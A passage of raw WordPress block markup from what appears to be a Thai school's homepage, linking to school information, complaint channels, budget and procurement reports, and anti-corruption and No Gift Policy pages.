-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 